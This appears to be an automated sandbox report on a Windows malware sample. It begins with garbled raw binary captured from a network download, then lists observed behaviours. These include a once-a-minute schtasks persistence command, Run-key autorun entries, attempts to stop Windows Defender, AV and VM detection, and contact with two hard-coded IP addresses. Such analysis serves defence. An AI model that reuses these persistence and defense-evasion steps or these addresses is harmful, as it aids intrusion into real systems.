ë3À]ÂÿUìì¡@3ÅEüSVW3ÀfÇEøñEôhD@uèØÿx @øÿtjhT@Wÿ @EðÀtP3ÉEìPQQQQQQh j jEôPCÿ$ @ÀtMðôÿuèÿuìjÿ¢@ÿUð;ôt¹Í)ÿuìÿ @Wÿ¬ @MüÃ_^3Í[èATå]ÃÿUìì¡@3ÅEü¡(@SWj3ÛfÇEø_]ô]ð;ÇôMðèÿÿÿÀÓEèPjÿ¡@Pÿ @ÀÉEìPSSWÿuèÿ @Àÿl @øzVÿuìSÿP¡@ðötqEìPÿuìVWÿuèÿ @ÀtTEäPSSSSSSh j WEôPÿ$ @Àt49v'~ÿuäÿ7ÿ, @Àu CÇ;réë3À@£(@Eðÿuäÿ @Vÿ¤ @^ÿuèÿ @EðëEðÀt Ç(@Mü_3Í[èSå]ÃÌÌÌÌÌÌÌÿUìì¡@3ÅEüEVu-t!èuUÃ÷ÿÿùw RVÿà¡@ëP3ÀëOÿÌ¡@ÐÎè)hüýÿÿÆüýÿÿPÿuÿ5<@ÿè¡@üýÿÿPh?VÿÔ¡@jÿÿÜ¡@3À@Mü3Í^èbRå]ÂÿUìQSÁÚVWEü3ÿ0ë>tFf¾ËèÔKÀuëEüf¾0ë3Àë#<7tGf¾7Ëè®KÀté78tÆ@_^[å]ÃÿUìì¡@3ÅEüEºSVÙèùÿÿEôýÿÿWSìùÿÿè[ûÿÿ½ôýÿÿ"u ºl@õýÿÿëºp@ôýÿÿðùÿÿðùÿÿè-ÿÿÿµðùÿÿøöt<ÎQAÀuù+Êùr)F<:u~\t >\u<\uVºøþÿÿèãúÿÿë(Qhä@QºøþÿÿèËûÿÿVºøþÿÿèÃIj.ZÎè÷JÀjÿht@jÿPjjÿh @Hè\|øþÿÿPÿ request_handle: 0x00cc000c	1	1
InternetReadFile June 13, 2023, 8:30 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyáå~Lyáâ~Ryáä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPEL9pdà!Þ>ð°@ J<K<øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD`D@À.rsrcøP@@.relocTR@Bj h¨<¹phè?#hêèYÃÌÌÌj8hÌ<¹hè#h`êèlYÃÌÌÌj8hÌ<¹ hèÿ"hÀêèLYÃÌÌÌj8hÌ<¹¸hèß"h ëè,YÃÌÌÌj8h=¹Ðhè¿"hëè*YÃÌÌÌj0hD=¹èhè"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌhh°=¹iè\"h ìè©)YÃj?h>¹0iè?"híè)YÃÌÌÌÁÂÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPèÂ2ÄÆ^]ÂÌÌÌI¸\|<ÉEÁÃÌÌUìVñFÇñPèó2ÄöEtjVè«%ÄÆ^]ÂAÇñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌUììMôèÒÿÿÿhJEôPè2ÌÌÌÌUìVñWÀFPÇñfÖEÀPèò1ÄÇìñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìVñWÀFPÇñfÖEÀPè²1ÄÇ ñÆ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌUìQSZVWQSñè=h3É3À}üÛ~53Ò;ÇþEÐ=h¸phCph~r>A}üB;Ë\|Ë~r_ÆÆ^[å]Ã_ÆÆ^[å]ÃÌÌÌÌÌUììSVWòùQ}ôFPEðè3Û]ø9]ð)D~Ær¾Pè¯KÄÀu-NÆùr< tÆùrÏréÌ~Ær=@i3Ò Diÿt+EÿfD]ÿù¸0iC0i8]øtB;×ráÊÿEÈxr3Àÿt.MÿD=Di¹0i]ÿC 0i8]øt@;ÇrÝÈÿ=Di¹0iC 0iMìMôMøyr MøÏ+È 3Ò÷÷Mì}ô MøC]ø;]ðÜþÿÿrÆÇ_^[å]ÃÆÇ_^[å]ÃÌÌÌÌÌÌÌÌÌÌUìì@SVWÙòQMÄ]ôèçýÿÿEÄÖPMÜèYþÿÿhÇCÇCÆè°"Ø¹Èÿ]øûÄó«3Ò¾8>Bú@\|ðUì3ö3Û~øÒtAMø}ðEÜCEÜ¾øÿt'ÁæðÇxÏÆÓøMôPèUìïMøC;ÚrÂEøÀthPèð!ÄUðúr(MÜBÁúrIüÂ#+ÁÀüøwVRQèÀ!ÄUØÇEìÇEðÆEÜúr(MÄBÁúrIüÂ#+ÁÀüøwRQè~!ÄEô_^[å]ÃèGÌÌÌÌÌÌÌÌÌÌÌUìì4E0SVW3ÿÆEè¾À]ÇEàÇEäÆEÐ;Ç´+ÇMÐ;ÃBØ}4E CE SÇPèþr.MèVÁúrIüÂ#+ÁÀüøhRQè× ÄMÐ}Uó~EàEèCU}äuà]f~ÉMèCÁfÖEø;óu\îr; uÀÂîsïþüî: u7þýßH:Ju&þþÎH:Juþÿ½@:B±E0Guü;øõþÿÿ3ÿUþr/MèFÁþrIüÆ#+ÁÀüøVQè UÄEør'HÂùrRüÁ#+ÂÀüøw`QRèÏÄU4ÇEÇEÆEúr3M BÁúrIüÂ#+ÁÀüøwë uüGéWÿÿÿRQèÄÇ_^[å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌUìQS]Vñ]üWjhÀ>ÇFÇFÆèD3ÿÛ~1}ECE8S¿C ú¶È¶ÃGÈ¶ÁÎPèG;}ü\|ÏUúr(MBÁúrIüÂ#+ÁÀüøwRQèÑÄ_Æ^[å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUìì0VWj$hÄ>MÐÇEàÇEäÆEÐèEÀu3öéÇ3ÿÀ¸ÇEøÇEüÆEè;ÇF+Ç¹;ÁBÈ}ECEQÇMèPèBìEÐÌPètìEèôìÌPèaÎèªþÿÿÄè¢üÿÿUüÄ0Àúr,MèBÁúrIüÂ#+ÁÀüø¹RQèÇÄEG;øHÿÿÿ¾Uäúr(MÐBÁúrIüÂ#+ÁÀüøwxRQèÄUúr^MBÁúrFIüÂ#+ÁÀüøwHë4úr(MèBÁúrIüÂ#+ÁÀüøw#RQè1Ä3öétÿÿÿRQè Ä_Æ^å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌUìQEUMVÀS@WPè] ÄM}ØÓCM+ÑID ÿÀuóóNFÀuù+ñFVjÿðVøSWÿðPèÇ5ÄWÿðjÿñÿñWjÿñÿ ñUM_[^úr%BÁúrIüÂ#+ÁÀüøwRQèAÄå]ÃèdBÌÌÌÌUìì$SVWùjÇGÇGÆÿñÀj ÿ$ñØ]üÛlSÿðEôÀSjjjjjÿPjhéýÿððuøö.WN;ÊwOÇrÆëFGÙ+Ú+Â;Øw%ÇOrS4jVèE,ÆÄuøëQSÆEøÏÿuøSè¨]üÇrjjVPjÿÿuô request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x000baa00', u'virtual_address': u'0x0000c000', u'entropy': 7.933970957884983, u'name': u'.rsrc', u'virtual_size': u'0x000bb000'}

entropy

7.93397095788

description

A section with a high entropy has been found

entropy

0.958279845956

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (9 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW June 13, 2023, 8:29 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 13, 2023, 8:29 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 13, 2023, 8:29 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 13, 2023, 8:29 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 13, 2023, 8:29 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 13, 2023, 8:29 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 13, 2023, 8:22 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 13, 2023, 8:22 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW June 13, 2023, 8:30 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Queries for potentially installed applications (50 out of 255 events)

Time & API	Arguments	Status
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000003c0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: 7-Zip base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: AddressBook base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: Adobe AIR base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: Connection Manager base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: DirectDrawEx base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: EditPlus base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: Fontcore base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: Google Chrome base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: IE40 base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: IE4Data base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: IE5BAKEX base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: IEData base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: MobileOptionPack base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: Office15.PROPLUSR base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: SchedulingAgent base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: WIC base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExW June 13, 2023, 8:29 a.m.	regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x000003c0 key_handle: 0x000003c4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN lamod.exe /TR "C:\Users\test22\AppData\Local\Temp\a9e2a16078\lamod.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN lamod.exe /TR "C:\Users\test22\AppData\Local\Temp\a9e2a16078\lamod.exe" /F

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

Communicates with host for which no DNS query was performed (2 events)

host	77.91.68.30
host	83.97.73.129

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService June 13, 2023, 8:29 a.m.	service_handle: 0x0056f6d0 service_name: WinDefend control_code: 1		0	0
ControlService June 13, 2023, 8:29 a.m.	service_handle: 0x0057caf8 service_name: wuauserv control_code: 1		0	0

Installs itself for autorun at Windows startup (15 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\foto164.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000007051\foto164.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fotod75.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000008051\fotod75.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP004.TMP\"
